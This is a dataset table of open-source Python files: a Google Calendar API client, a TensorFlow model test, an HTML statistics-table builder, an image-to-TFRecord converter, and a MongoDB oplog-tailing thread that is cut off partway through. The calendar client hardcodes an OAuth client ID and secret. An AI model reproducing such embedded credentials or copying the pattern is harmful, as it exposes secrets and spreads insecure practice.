repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
felixb/v2gcalendar | v2gcalendar/calendar_service.py | 1 | 3566 | __author__ = 'flx'
from apiclient.discovery import build
import httplib2
from oauth2client import tools
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
from oauth2client.tools import run_flow
# For this example, the client id and client secret are hardcoded below.
client_id = \
'826222712854-das8sdv4veehjje2o4e45sbvnrd8fi5n.apps.googleusercontent.com'
client_secret = 'CKBI_J4aE7QaEWLTxTyjGF-u'
# The scope URL for read/write access to a user's calendar data
scope = 'https://www.googleapis.com/auth/calendar'
# Create a flow object. This object holds the client_id, client_secret, and
# scope. It assists with OAuth 2.0 steps to get user authorization and
# credentials.
flow = OAuth2WebServerFlow(client_id, client_secret, scope)
class CalendarService:
def __init__(self):
self._service = None
self.init_service()
def init_service(self):
if self._service:
return
storage = Storage('credentials.dat')
credentials = storage.get()
if not credentials or credentials.invalid:
parser = tools.argparser
flags = parser.parse_args([])
credentials = run_flow(flow, storage, flags)
http = httplib2.Http()
http = credentials.authorize(http)
self._service = build('calendar', 'v3', http=http)
def get_calendars(self):
result = []
request = self._service.calendarList().list()
while request:
response = request.execute()
for calendar in response.get('items', []):
result.append(calendar)
request = self._service.calendarList().list_next(request, response)
return result
def find_calendar(self, name):
calendars = self.get_calendars()
for calendar in calendars:
if calendar['summary'] == name:
return calendar['id']
def clear(self, calendar_id):
request = self._service.calendars().clear(calendarId=calendar_id)
result = request.execute()
return result
def get_events(self, calendar_id, show_deleted=False):
results = []
request = self._service.events().list(calendarId=calendar_id,
showDeleted=show_deleted)
while request:
response = request.execute()
for event in response.get('items', []):
results.append(event)
request = self._service.events().list_next(request, response)
return results
def add_event(self, calendar_id, event):
response = self._service.events().insert(calendarId=calendar_id,
body=event,
sendNotifications=False)\
.execute()
return response
def update_event(self, calendar_id, event):
response = self._service.events().update(calendarId=calendar_id,
eventId=event['id'],
body=event,
sendNotifications=False)\
.execute()
return response
def delete_event(self, calendar_id, event_id):
response = self._service.events().delete(calendarId=calendar_id,
eventId=event_id,
sendNotifications=False)\
.execute()
return response
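# Example usage (a sketch only; the calendar name below is hypothetical):
#
#     service = CalendarService()
#     cal_id = service.find_calendar('v2g')
#     for event in service.get_events(cal_id):
#         print(event.get('summary'))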
| apache-2.0 | -2,096,562,204,030,105,600 | 35.387755 | 79 | 0.579641 | false | 4.479899 | false | false | false |
google/uncertainty-baselines | uncertainty_baselines/models/wide_resnet_condconv_test.py | 1 | 2177 | # coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for WRN 28-10 with Monte Carlo dropout."""
import tensorflow as tf
import uncertainty_baselines as ub
class WideResnetCondConvTest(tf.test.TestCase):
def testWideResnetCondConv(self):
tf.random.set_seed(83922)
dataset_size = 15
batch_size = 5
input_shape = (32, 32, 1)
num_classes = 2
features = tf.random.normal((dataset_size,) + input_shape)
coeffs = tf.random.normal([tf.reduce_prod(input_shape), num_classes])
net = tf.reshape(features, [dataset_size, -1])
logits = tf.matmul(net, coeffs)
labels = tf.random.categorical(logits, 1)
dataset = tf.data.Dataset.from_tensor_slices((features, labels))
dataset = dataset.repeat().shuffle(dataset_size).batch(batch_size)
model = ub.models.wide_resnet_condconv(
input_shape=input_shape,
depth=10,
width_multiplier=1,
num_classes=num_classes,
l2=0.,
num_experts=5,
per_core_batch_size=batch_size,
use_cond_dense=True,
reduce_dense_outputs=True,
cond_placement='all',
routing_fn='softmax',
normalize_routing=False,
normalize_dense_routing=False,
top_k=-1,
routing_pooling='flatten')
model.compile(
'adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))
history = model.fit(
dataset, steps_per_epoch=dataset_size // batch_size, epochs=2)
loss_history = history.history['loss']
self.assertAllGreaterEqual(loss_history, 0.)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 8,842,494,253,316,627,000 | 31.984848 | 77 | 0.678916 | false | 3.586491 | true | false | false |
salmoni/Salstat | tabler.py | 1 | 7586 | """
tabler.py
Creates tables in HTML for Salstat
Submit a list of [heading: value] pairs in the desired order
p-values are automatically formatted as %1.6f; other values fall back to str()
The first two routines are generic and for single answer results.
Following are a handful of tabler functions for particular tests
(c) 2013, Alan James Salmoni
"""
def tableANOVAWithin(results):
ln1 = '<table class="table table-striped"><tr>\n'
headhtml = '<tr><th>Variable</th><th>Source</th><th>Sum of squares</th><th>DF</th><th>Mean square</th><th>F</th><th>p</th></tr>\n'
l1vars = ("Name",results["SSbet"],results["DFbet"],results["MSbet"],results["F"],results["p"])
l2vars = (results["SSwit"],results["DFwit"],results["MSwit"])
l3vars = (results["SSres"],results["DFres"],results["MSres"])
l4vars = (results["SSint"])
l5vars = (results["SStot"],results["DFtot"])
line1 = '<tr><td>%s</td><td>Between groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td>%.3f</td><td>%1.4f</td></tr>\n'%(l1vars)
line2 = '<tr><td></td><td>Within groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td></td><td></td></tr>\n'%(l2vars)
line3 = '<tr><td></td><td>Residual</td><td>%.3f</td><td>%d</td><td>%.3f</td><td></td><td></td></tr>\n'%(l3vars)
line4 = '<tr><td></td><td>Interaction</td><td>%.3f</td><td></td><td></td><td></td><td></td></tr>\n'%(l4vars)
line5 = '<tr><td></td><td>Total</td><td>%.3f</td><td>%d</td><td></td><td></td><td></td></tr>\n'%(l5vars)
line = ln1+headhtml+line1+line3+line4+line2+line5+'</table>'
return line
def tableANOVABetween(results):
ln1 = '<table class="table table-striped"><tr>\n'
headhtml = '<tr><th>Variable</th><th>Source</th><th>Sum of squares</th><th>DF</th><th>Mean square</th><th>F</th><th>p</th></tr>\n'
l1vars = ("Name",results["SSbet"],results["DFbet"],results["MSbet"],results["F"],results["p"])
l2vars = (results["SSwit"],results["DFerr"],results["MSerr"])
l3vars = (results["SStot"],results["DFtot"])
line1 = '<tr><td>%s</td><td>Between groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td>%.3f</td><td>%1.4f</td></tr>\n'%(l1vars)
line2 = '<tr><td></td><td>Within groups</td><td>%.3f</td><td>%d</td><td>%.3f</td></tr>\n'%(l2vars)
line3 = '<tr><td></td><td>Total</td><td>%.3f</td><td>%d</td></tr>\n'%(l3vars)
line = ln1+headhtml+line1+line2+line3+'</table>'
return line
def table(ListofLists):
ln1 = '<table class="table table-striped"><tr>'
ln2 = '<tr>'
for List in ListofLists:
key = List[0]
val = List[1]
headhtml = '<th>%s</th>'%key
if key == 'p':
try:
foothtml = '<td>%1.6f</td>'%val
except TypeError:
foothtml = '<td>n/a</td>'
elif type(val) is int:
foothtml = '<td>%d</td>'%val
elif (type(val) is str):
foothtml = '<td>%s</td>'%val
#elif type(val) is float:
else:
fltstr = str(val)
foothtml = '<td>%s</td>'%fltstr
# really need to figure out what parameters make a good display for each number
ln1 = ln1 + headhtml
ln2 = ln2 + foothtml
ln1 = ln1 + '</tr>' + ln2 + '</tr>\n</table>\n'
return ln1
def vtable(List):
key = List[0]
vals = List[1:]
btn_id = ' id="%s"'%key
chartbutton = '<a class="btn btn-mini dropdown-toggle"%s data-toggle="dropdown" \
href="#">Chart</a>\n'%btn_id
linehtml = '<tr><td>%s</td>'%(key)
for val in vals:
        if key == 'p':
            try:
                linehtml = linehtml + '<td>%1.6f</td>' % val
            except TypeError:
                linehtml = linehtml + '<td>n/a</td>'
elif type(val) is int:
linehtml = linehtml + '<td>%d</td>'%val
elif (type(val) is str):
linehtml = linehtml + '<td>%s</td>'%val
elif type(val) is float:
linehtml = linehtml + '<td>%s</td>'%str(val)
elif type(val) is tuple:
print ("TUPLE!", val)
else:
try:
linehtml = linehtml + '<td>%s</td>'%str(val)
except:
pass
linehtml = linehtml + '</tr>\n'
return linehtml
def tableHinges(List):
key = List[0]
vals = List[1:]
linehtml = '<tr><td>%s</td>'%(key)
for val in vals:
linehtml += '<td>%s, %s</td>'%(str(val[0]), str(val[1]))
linehtml += '</tr>\n'
return linehtml
def tableMultiples(vals, varName):
table = '<h3>%s</h3><table class="table table-striped">\n'%varName
table += '\t<tr><th>Value</th>'
try:
if vals['freqs']:
table += '<th>Frequencies</th>'
except ValueError:
table += '<th>Frequencies</th>'
try:
if vals['props']:
table += '<th>Proportions</th>'
except ValueError:
table += '<th>Proportions</th>'
try:
if vals['percs']:
table += '<th>Percentages</th>'
except ValueError:
table += '<th>Percentages</th>'
table += '</tr>\n'
N = len(vals['values'])
for idx in range(N):
table += '\t<tr><td>%s</td>'%vals['values'][idx]
try:
if vals['freqs']:
table += '<td>%s</td>'%vals['freqs'][idx]
except ValueError:
table += '<td>%s</td>'%vals['freqs'][idx]
try:
if vals['props']:
table += '<td>%s</td>'%vals['props'][idx]
except ValueError:
table += '<td>%s</td>'%vals['props'][idx]
try:
if vals['percs']:
table += '<td>%s %%</td>'%vals['percs'][idx]
except ValueError:
table += '<td>%s %%</td>'%vals['percs'][idx]
table += '</tr>\n'
table += '</table>\n'
return table
def tableFrequencies(List):
table = '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Frequency</th></tr>\n'
for var in List:
values = var[0]
freqs = var[1]
table += '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Frequency</th></tr>\n'
for idx, row in enumerate(values):
table += '\t<tr><td>%s</td><td>%s</td></tr>\n'%(str(row),str(freqs[idx]))
table += '</table>\n'
return table
def tableProportions(List):
"""
    Receives a list of array pairs:
    array 1 = values
    array 2 = corresponding proportions
"""
table = ''
for turn in List:
vals = turn[0]
props = turn[1]
table += '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Proportion</th></tr>\n'
for idx, val in enumerate(vals):
table += '\t<tr><td>%s</td><td>%s</td></tr>\n'%(str(val),str(props[idx]))
table += '</table>\n'
return table
def tableMode(List):
"""
Produces a table to display modes.
Passed are two arrays:
1 = frequency
2 = modal values
"""
table = '<h3>Mode</h3>\n<table class="table table-striped">\n'
table += '\t<tr><th>Frequency</th><th>Modal values</th></tr>\n'
for turn in List:
freq = turn[0]
vals = turn[1]
table += '\t<tr><td>%s</td><td>%s<br />'%(str(freq), str(vals[0]))
for idx in range(1, len(vals)):
table += '\t%s<br />\n'%(str(vals[idx]))
table += '</td></tr>\n\t<tr><td></td><td></td></tr>\n'
table += '</table>\n'
return table
if __name__ == '__main__':
a1 = ['Variable 1','Var001']
a2 = ['Variable 2','Var002']
a3 = ['df',99]
a4 = ['t',30.0001]
a5 = ['p',0.003]
a = [a1,a2,a3,a4,a5]
print (table(a))
| gpl-2.0 | 5,365,793,006,503,404,000 | 36.004878 | 134 | 0.521355 | false | 2.985439 | false | false | false |
velastin/UAndes | convert_to_records.py | 1 | 7327 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Downloads and converts Flowers data to TFRecords of TF-Example protos.
This module downloads the Flowers data, uncompresses it, reads the files
that make up the Flowers data and creates two TFRecord datasets: one for train
and one for test. Each TFRecord dataset is comprised of a set of TF-Example
protocol buffers, each of which contain a single image and label.
The script should take about a minute to run.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
import random
import sys
import argparse
import tensorflow as tf
from datasets import dataset_utils
# The number of images in the validation set.
_NUM_VALIDATION = 350
# Seed for repeatability.
_RANDOM_SEED = 0
# The number of shards per dataset split.
_NUM_SHARDS = 5
class ImageReader(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Initializes function that decodes RGB JPEG data.
self._decode_png_data = tf.placeholder(dtype=tf.string)
self._decode_png = tf.image.decode_png(self._decode_png_data, channels=3)
def read_image_dims(self, sess, image_data):
image = self.decode_png(sess, image_data)
return image.shape[0], image.shape[1]
def decode_png(self, sess, image_data):
image = sess.run(self._decode_png,
feed_dict={self._decode_png_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _get_filenames_and_classes(dataset_dir):
"""Returns a list of filenames and inferred class names.
Args:
dataset_dir: A directory containing a set of subdirectories representing
class names. Each subdirectory should contain PNG or JPG encoded images.
Returns:
A list of image file paths, relative to `dataset_dir` and the list of
subdirectories, representing class names.
"""
pedestrian_root = os.path.join(dataset_dir, 'pedestrian_photos')
directories = []
class_names = []
for filename in os.listdir(pedestrian_root):
path = os.path.join(pedestrian_root, filename)
if os.path.isdir(path):
directories.append(path)
class_names.append(filename)
photo_filenames = []
for directory in directories:
for filename in os.listdir(directory):
path = os.path.join(directory, filename)
photo_filenames.append(path)
return photo_filenames, sorted(class_names)
def _get_dataset_filename(dataset_dir, split_name, shard_id):
output_filename = 'pedestrian_%s_%05d-of-%05d.tfrecord' % (
split_name, shard_id, _NUM_SHARDS)
return os.path.join(dataset_dir, output_filename)
def _convert_dataset(split_name, filenames, class_names_to_ids, dataset_dir):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
assert split_name in ['train', 'validation']
num_per_shard = int(math.ceil(len(filenames) / float(_NUM_SHARDS)))
with tf.Graph().as_default():
image_reader = ImageReader()
with tf.Session('') as sess:
for shard_id in range(_NUM_SHARDS):
output_filename = _get_dataset_filename(
dataset_dir, split_name, shard_id)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d' % (
i+1, len(filenames), shard_id))
sys.stdout.flush()
# Read the filename:
image_data = tf.gfile.FastGFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(sess, image_data)
class_name = os.path.basename(os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
example = dataset_utils.image_to_tfexample(
image_data, b'png', height, width, class_id)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush()
def _clean_up_temporary_files(dataset_dir):
"""Removes temporary files used to create the dataset.
Args:
dataset_dir: The directory where the temporary files are stored.
"""
filename = _DATA_URL.split('/')[-1]
filepath = os.path.join(dataset_dir, filename)
tf.gfile.Remove(filepath)
tmp_dir = os.path.join(dataset_dir, 'pedestrian_photos')
tf.gfile.DeleteRecursively(tmp_dir)
def _dataset_exists(dataset_dir):
for split_name in ['train', 'validation']:
for shard_id in range(_NUM_SHARDS):
output_filename = _get_dataset_filename(
dataset_dir, split_name, shard_id)
if not tf.gfile.Exists(output_filename):
return False
return True
def run(dataset_dir):
"""Runs the download and conversion operation.
Args:
dataset_dir: The dataset directory where the dataset is stored.
"""
if not tf.gfile.Exists(dataset_dir):
tf.gfile.MakeDirs(dataset_dir)
if _dataset_exists(dataset_dir):
print('Dataset files already exist. Exiting without re-creating them.')
return
photo_filenames, class_names = _get_filenames_and_classes(dataset_dir)
class_names_to_ids = dict(zip(class_names, range(len(class_names))))
# Divide into train and test:
random.seed(_RANDOM_SEED)
random.shuffle(photo_filenames)
training_filenames = photo_filenames[_NUM_VALIDATION:]
validation_filenames = photo_filenames[:_NUM_VALIDATION]
# First, convert the training and validation sets.
_convert_dataset('train', training_filenames, class_names_to_ids,
dataset_dir)
_convert_dataset('validation', validation_filenames, class_names_to_ids,
dataset_dir)
# Finally, write the labels file:
labels_to_class_names = dict(zip(range(len(class_names)), class_names))
dataset_utils.write_label_file(labels_to_class_names, dataset_dir)
#_clean_up_temporary_files(dataset_dir)
  print('\nFinished converting the pedestrian dataset!')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='convert dataset to tf records')
parser.add_argument('dataset_dir', help='path to the dataset')
args = parser.parse_args()
run(args.dataset_dir)
| gpl-3.0 | -1,976,234,764,730,661,400 | 29.529167 | 80 | 0.684318 | false | 3.702375 | false | false | false |
gwaller/mongo-connector | mongo_connector/oplog_manager.py | 1 | 30523 | # Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import pymongo
import sys
import time
import threading
import traceback
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.util import retry_until_ok
from pymongo import MongoClient
class OplogThread(threading.Thread):
"""OplogThread gathers the updates for a single oplog.
"""
def __init__(self, primary_conn, main_address, oplog_coll, is_sharded,
doc_manager, oplog_progress_dict, namespace_set, auth_key,
auth_username, repl_set=None, collection_dump=True,
batch_size=DEFAULT_BATCH_SIZE, fields=None,
dest_mapping={}, continue_on_error=False):
"""Initialize the oplog thread.
"""
super(OplogThread, self).__init__()
self.batch_size = batch_size
#The connection to the primary for this replicaSet.
self.primary_connection = primary_conn
#Boolean chooses whether to dump the entire collection if no timestamp
# is present in the config file
self.collection_dump = collection_dump
#The mongos for sharded setups
#Otherwise the same as primary_connection.
#The value is set later on.
self.main_connection = None
#The connection to the oplog collection
self.oplog = oplog_coll
#Boolean describing whether the cluster is sharded or not
self.is_sharded = is_sharded
#A document manager for each target system.
#These are the same for all threads.
if type(doc_manager) == list:
self.doc_managers = doc_manager
else:
self.doc_managers = [doc_manager]
#Boolean describing whether or not the thread is running.
self.running = True
#Stores the timestamp of the last oplog entry read.
self.checkpoint = None
#A dictionary that stores OplogThread/timestamp pairs.
#Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
#The set of namespaces to process from the mongo cluster.
self.namespace_set = namespace_set
#The dict of source namespaces to destination namespaces
self.dest_mapping = dest_mapping
#Whether the collection dump gracefully handles exceptions
self.continue_on_error = continue_on_error
#If authentication is used, this is an admin password.
self.auth_key = auth_key
#This is the username used for authentication.
self.auth_username = auth_username
# Set of fields to export
self._fields = set(fields) if fields else None
logging.info('OplogThread: Initializing oplog thread')
if is_sharded:
self.main_connection = MongoClient(main_address)
else:
self.main_connection = MongoClient(main_address,
replicaSet=repl_set)
self.oplog = self.main_connection['local']['oplog.rs']
if auth_key is not None:
#Authenticate for the whole system
self.primary_connection['admin'].authenticate(
auth_username, auth_key)
self.main_connection['admin'].authenticate(
auth_username, auth_key)
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
logging.warning('%s %s' % (err_msg, self.primary_connection))
@property
def fields(self):
return self._fields
@fields.setter
def fields(self, value):
if value:
self._fields = set(value)
# Always include _id field
self._fields.add('_id')
else:
self._fields = None
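    # For example (hypothetical values): setting thread.fields = ['name', 'email']
    # stores {'name', 'email', '_id'}, while thread.fields = None disables the
    # field filtering altogether.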
def run(self):
"""Start the oplog worker.
"""
logging.debug("OplogThread: Run thread started")
while self.running is True:
logging.debug("OplogThread: Getting cursor")
cursor = self.init_cursor()
logging.debug("OplogThread: Got the cursor, go go go!")
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
logging.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
#The only entry is the last one we processed
if cursor is None or util.retry_until_ok(cursor.count) == 1:
logging.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
last_ts = None
err = False
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
logging.debug("OplogThread: about to process new oplog "
"entries")
while cursor.alive and self.running:
logging.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
logging.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
# Break out if this thread should stop
if not self.running:
break
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
continue
# Take fields out of the oplog entry that
# shouldn't be replicated. This may nullify
# the document if there's nothing to do.
if not self.filter_oplog_entry(entry):
continue
#sync the current oplog operation
operation = entry['op']
ns = entry['ns']
# use namespace mapping if one exists
ns = self.dest_mapping.get(entry['ns'], ns)
for docman in self.doc_managers:
try:
logging.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
# Remove
if operation == 'd':
entry['_id'] = entry['o']['_id']
entry['ns'] = ns
docman.remove(entry)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
doc['_ts'] = util.bson_ts_to_long(
entry['ts'])
doc['ns'] = ns
docman.upsert(doc)
upsert_inc += 1
# Update
elif operation == 'u':
doc = {"_id": entry['o2']['_id'],
"_ts": util.bson_ts_to_long(
entry['ts']),
"ns": ns}
# 'o' field contains the update spec
docman.update(doc, entry.get('o', {}))
update_inc += 1
except errors.OperationFailed:
logging.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
logging.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
logging.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
logging.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1 and last_ts is not None:
self.checkpoint = last_ts
self.update_checkpoint()
# update timestamp after running through oplog
if last_ts is not None:
logging.debug("OplogThread: updating checkpoint after"
"processing new oplog entries")
self.checkpoint = last_ts
self.update_checkpoint()
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
logging.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
err = True
if err is True and self.auth_key is not None:
self.primary_connection['admin'].authenticate(
self.auth_username, self.auth_key)
self.main_connection['admin'].authenticate(
self.auth_username, self.auth_key)
err = False
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
logging.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.checkpoint = last_ts
self.update_checkpoint()
logging.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
logging.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
def filter_oplog_entry(self, entry):
"""Remove fields from an oplog entry that should not be replicated."""
if not self._fields:
return entry
def pop_excluded_fields(doc):
for key in set(doc) - self._fields:
doc.pop(key)
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
pop_excluded_fields(entry['o'])
# 'u' indicates an update. 'o' field is the update spec.
elif entry['op'] == 'u':
pop_excluded_fields(entry['o'].get("$set", {}))
pop_excluded_fields(entry['o'].get("$unset", {}))
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry['o'] and not entry['o']['$set']:
entry['o'].pop("$set")
if "$unset" in entry['o'] and not entry['o']['$unset']:
entry['o'].pop("$unset")
if not entry['o']:
return None
return entry
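    # Illustrative behaviour (hypothetical values): with self._fields set to
    # {'_id', 'name'}, an insert entry {'op': 'i', 'o': {'_id': 1, 'name': 'a', 'age': 3}}
    # is trimmed to {'op': 'i', 'o': {'_id': 1, 'name': 'a'}}, and an update whose
    # $set/$unset specs end up empty is dropped entirely (returns None).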
def get_oplog_cursor(self, timestamp):
"""Move cursor to the proper place in the oplog.
"""
logging.debug("OplogThread: Getting the oplog cursor and moving it "
"to the proper place in the oplog.")
if timestamp is None:
return None
cursor, cursor_len = None, 0
while (True):
try:
logging.debug("OplogThread: Getting the oplog cursor "
"in the while true loop for get_oplog_cursor")
if not self.namespace_set:
cursor = self.oplog.find(
{'ts': {'$gte': timestamp}},
tailable=True, await_data=True
)
else:
cursor = self.oplog.find(
{'ts': {'$gte': timestamp},
'ns': {'$in': self.namespace_set}},
tailable=True, await_data=True
)
# Applying 8 as the mask to the cursor enables OplogReplay
cursor.add_option(8)
logging.debug("OplogThread: Cursor created, getting a count.")
cursor_len = cursor.count()
logging.debug("OplogThread: Count is %d" % cursor_len)
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
pass
if cursor_len == 0:
logging.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
#rollback, we are past the last element in the oplog
timestamp = self.rollback()
logging.info('Finished rollback')
return self.get_oplog_cursor(timestamp)
first_oplog_entry = retry_until_ok(lambda: cursor[0])
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry.get("ts"))
given_ts_long = util.bson_ts_to_long(timestamp)
if cursor_ts_long > given_ts_long:
# first entry in oplog is beyond timestamp, we've fallen behind!
return None
elif cursor_len == 1: # means we are the end of the oplog
self.checkpoint = timestamp
#to commit new TS after rollbacks
return cursor
elif cursor_len > 1:
doc = retry_until_ok(next, cursor)
if timestamp == doc['ts']:
return cursor
else: # error condition
logging.error('OplogThread: %s Bad timestamp in config file'
% self.oplog)
return None
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
dump_set = self.namespace_set or []
logging.debug("OplogThread: Dumping set of collections %s " % dump_set)
#no namespaces specified
if not self.namespace_set:
db_list = retry_until_ok(self.main_connection.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.main_connection[database].collection_names)
for coll in coll_list:
if coll.startswith("system"):
continue
namespace = "%s.%s" % (database, coll)
dump_set.append(namespace)
timestamp = util.retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
def docs_to_dump():
for namespace in dump_set:
logging.info("OplogThread: dumping collection %s"
% namespace)
database, coll = namespace.split('.', 1)
last_id = None
attempts = 0
# Loop to handle possible AutoReconnect
while attempts < 60:
target_coll = self.main_connection[database][coll]
if not last_id:
cursor = util.retry_until_ok(
target_coll.find,
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = util.retry_until_ok(
target_coll.find,
{"_id": {"$gt": last_id}},
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
raise StopIteration
doc["ns"] = self.dest_mapping.get(
namespace, namespace)
doc["_ts"] = long_ts
last_id = doc["_id"]
yield doc
break
except pymongo.errors.AutoReconnect:
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_inserted = 0
num_failed = 0
for num, doc in enumerate(docs_to_dump()):
if num % 10000 == 0:
logging.debug("Upserted %d docs." % num)
try:
dm.upsert(doc)
num_inserted += 1
except Exception:
if self.continue_on_error:
logging.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
logging.debug("Upserted %d docs" % num_inserted)
if num_failed > 0:
logging.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
dm.bulk_upsert(docs_to_dump())
except Exception as e:
if self.continue_on_error:
logging.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
# Bulk upsert if possible
if hasattr(dm, "bulk_upsert"):
logging.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
else:
logging.debug(
"OplogThread: DocManager %s has no "
"bulk_upsert method. Upserting documents "
"serially for collection dump." % str(dm))
upsert_each(dm)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
klass, value, trace = errors.get_nowait()
dump_success = False
traceback.print_exception(klass, value, trace)
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
logging.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
return timestamp
def get_last_oplog_timestamp(self):
"""Return the timestamp of the latest entry in the oplog.
"""
if not self.namespace_set:
curr = self.oplog.find().sort(
'$natural', pymongo.DESCENDING
).limit(1)
else:
curr = self.oplog.find(
{'ns': {'$in': self.namespace_set}}
